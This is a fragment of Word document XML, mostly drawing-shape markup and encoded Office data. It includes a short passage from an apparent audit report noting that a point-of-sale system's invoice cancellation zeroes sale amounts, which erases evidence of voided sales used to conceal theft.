                                  <a:pt x="6894" y="142863"/>
                                  <a:pt x="4649" y="141932"/>
                                  <a:pt x="2789" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138212"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="929" y="4651"/>
                                  <a:pt x="2789" y="2791"/>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93" name="Shape 2093"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="828674" y="0"/>
                            <a:ext cx="571500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="571500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="561975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="564605" y="0"/>
                                  <a:pt x="566850" y="930"/>
                                  <a:pt x="568710" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="570569" y="4651"/>
                                  <a:pt x="571500" y="6896"/>
                                  <a:pt x="571500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="571500" y="135979"/>
                                  <a:pt x="570569" y="138212"/>
                                  <a:pt x="568710" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="566850" y="141932"/>
                                  <a:pt x="564605" y="142863"/>
                                  <a:pt x="561975" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>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1FF37FD" id="Group 27011" o:spid="_x0000_s1026" style="position:absolute;margin-left:395.95pt;margin-top:-1.6pt;width:110.25pt;height:11.25pt;z-index:-251398144" coordsize="14001,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&#10;BADzAAAAsgcAAAAA&#10;">
                <v:shape id="Shape 2090" o:spid="_x0000_s1027" style="position:absolute;width:7620;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7620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wiDwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4L+x/CG+xm0zkQV43iBMHDYGoneHw0z7bavJQmq5l/vTkIHj++37NFMI3oqXO1ZQXvSQqCuLC6&#10;5lLBb74eTkA4j6yxsUwK/snBYv4ymGGm7ZV31O99KWIIuwwVVN63mZSuqMigS2xLHLmT7Qz6CLtS&#10;6g6vMdw0cpSmY2mw5thQYUuriorL/s8o+DmHDfbu+NHKfJsfbsGdvr8mSr29huUUhKfgn+KHe6MV&#10;jNLPuD++iU9Azu8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFOMIg8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l752475,v2630,,4875,930,6735,2791c761070,4651,761999,6896,762000,9525r,123825c761999,135979,761070,138212,759210,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2631,-12,-4876,-943,-6736,-2803c929,138212,,135979,,133350l,9525c,6896,929,4651,2789,2791,4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,762000,142875"/>
                </v:shape>
                <v:shape id="Shape 2093" o:spid="_x0000_s1028" style="position:absolute;left:8286;width:5715;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5715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8KyxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvC/6HoQVv60QF0egoIuwqvvB18dZk2iSY6QmZMcZ/v7OwsMeiqr6ipvPGFKKmyuWWFfS6EQji&#10;xOqcUwXXy9fnCITzyBoLy6TgTQ7ms9bHFGNtX3yi+uxTESDsYlSQeV/GUrokI4Oua0vi4N1tZdAH&#10;WaVSV/gKcFPIfhQNpcGcw0KGJS0zSh7np1FgdnL0vB4PN8Tv46rc1sm+3uyU6rSbxQSEp8b/h//a&#10;a62gH40H8PsmPAE5+wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBS48KyxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9526,l561975,v2630,,4875,930,6735,2791c570569,4651,571500,6896,571500,9525r,123825c571500,135979,570569,138212,568710,140072v-1860,1860,-4105,2791,-6735,2803l9526,142875v-2631,-12,-4876,-943,-6736,-2803c930,138212,,135979,1,133350l1,9525c,6896,930,4651,2790,2791,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150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19360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48946492" wp14:editId="7FE31877">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>875407</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>151259</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1200150" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27013" name="Group 27013"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1200150" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1200150" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2096" name="Shape 2096"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4638"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135979"/>
                                  <a:pt x="808695" y="138212"/>
                                  <a:pt x="806835" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="141932"/>
                                  <a:pt x="802730" y="142863"/>
                                  <a:pt x="800100"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099" name="Shape 2099"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1085850" y="0"/>
                            <a:ext cx="114300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="114300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="107405" y="0"/>
                                  <a:pt x="109650" y="930"/>
                                  <a:pt x="111510" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="113370" y="4638"/>
                                  <a:pt x="114300" y="6896"/>
                                  <a:pt x="114300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="114300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="114300" y="135979"/>
                                  <a:pt x="113370" y="138212"/>
                                  <a:pt x="111510" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="109650" y="141932"/>
                                  <a:pt x="107405" y="142863"/>
                                  <a:pt x="1047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E3635CF" id="Group 27013" o:spid="_x0000_s1026" style="position:absolute;margin-left:68.95pt;margin-top:11.9pt;width:94.5pt;height:11.25pt;z-index:-251397120" coordsize="12001,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&#10;AAAEAAQA8wAAAH0HAAAAAA==&#10;">
                <v:shape id="Shape 2096" o:spid="_x0000_s1027" style="position:absolute;width:8096;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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KxJxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFv21QPotUoIgq6B8Eq7B6fzdu2bPNSmlirv94ICx6HmfmGmS87U4mWGldaVjCMYhDE&#10;mdUl5wrOp+3nBITzyBory6TgTg6Wi35vjom2Nz5Sm/pcBAi7BBUU3teJlC4ryKCLbE0cvF/bGPRB&#10;NrnUDd4C3FRyFMdjabDksFBgTeuCsr/0ahR8V/ujb9PN/nD4MXR5fE2m1y5T6mPQrWYgPHX+Hf5v&#10;77SCUTwdw+tNeAJy8QQAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAEkKxJxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l800100,v2630,,4875,930,6735,2778c808695,4638,809625,6896,809625,9525r,123825c809625,135979,808695,138212,806835,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,142875"/>
                </v:shape>
                <v:shape id="Shape 2099" o:spid="_x0000_s1028" style="position:absolute;left:10858;width:1143;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1143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SgxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvddO1FE1dRYSACD1oPPT4yL4mwezbJLtq8u+7BaHHYWa+YdbbwTbiTr2vHWt4mycg&#10;iAtnai41XPLsdQnCB2SDjWPSMJKH7WbyssbUuAef6H4OpYgQ9ilqqEJoUyl9UZFFP3ctcfR+XG8x&#10;RNmX0vT4iHDbSJUkH9JizXGhwpb2FRXX881qWHzlSo23Y5nV6ju/dmP3noVO69l02H2CCDSE//Cz&#10;fTAaVLJawd+b+ATk5hcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCeGpSgxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,r95250,c107405,,109650,930,111510,2778v1860,1860,2790,4118,2790,6747l114300,133350v,2629,-930,4862,-2790,6722c109650,141932,107405,142863,104775,142875r-95250,c6895,142863,4650,141932,2790,140072,930,138212,,135979,,133350l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,114300,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Worse, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invoice cancellation actively destroyed the evidence</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>update(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):446-487</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> overwrites </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>amount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net_total</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and every line's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>selling_price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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in place</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. After cancelling there was no way to distinguish a voided 500,000 LKR sale from a voided 500 LKR one, and no record of who voided it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F98D07"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This matters because cancelling an invoice is the classic way theft is concealed in a POS: take the cash, void the sale, and the stock returns to the shelf as though nothing happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3FCEB" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="58" w:line="259"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0384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="462E8EDB" wp14:editId="032B4AB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10262</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1047750" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27015" name="Group 27015"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1047750" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1047750" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2109" name="Shape 2109"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="409575" y="0"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4638"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
